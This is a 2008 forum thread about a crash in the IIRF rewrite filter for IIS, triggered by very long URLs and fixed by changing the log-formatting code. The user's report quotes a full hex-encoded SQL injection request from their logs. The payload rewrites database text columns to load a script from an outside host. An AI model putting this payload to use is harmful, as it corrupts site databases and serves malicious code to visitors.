%{QUERY_STRING} as RewriteCond crashes with long URLs

Topics: Developer Forum
Jun 11, 2008 at 3:50 PM
We've got sql injection attemps with very long URLs like these:

/sk/page.asp?lang=d&main=1&subs=0&did=1700;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E62696761646E65742E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);

Combined with this rule:

    RewriteCond %{QUERY_STRING} var_bereich
    RewriteRule .* /index.asp [R]

the site pool crashes. It restarts under a new process id.

I already tried the new 1.2.14b version. Our system is IIS7 under W2008.
Coordinator
Jun 11, 2008 at 7:18 PM

Got it.

I just duplicated this behavior.  Let me look into it.

Coordinator
Jun 11, 2008 at 8:39 PM
In this case, the crash is being caused by logging logic. 
One workaround then, is to turn off the logging, or turn it down to below 3.

I've opened a workitem for this.
http://www.codeplex.com/IIRF/WorkItem/View.aspx?WorkItemId=17002

It is fixed in change set 33905.

This fix will be in the next build of 1.2.14b preview.
Jun 12, 2008 at 6:58 AM
But I also get the error setting the log level to 0.
Coordinator
Jun 12, 2008 at 1:43 PM
hmmm, sorry about that.  Yes of course.   The error occurs during formatting of log messages.  The log level setting only affects whether the messages get displayed.

So, no workaround for the problem with long URLs.

Try the latest binary.
Jun 13, 2008 at 4:52 PM
Thanks a lot, seems to work ...
Coordinator
Jun 19, 2008 at 5:12 AM
ps: don't forget, IIRF is now donationware.
I am now accepting donations on behalf of my favorite charity.
If you find IIRF useful, consider donating.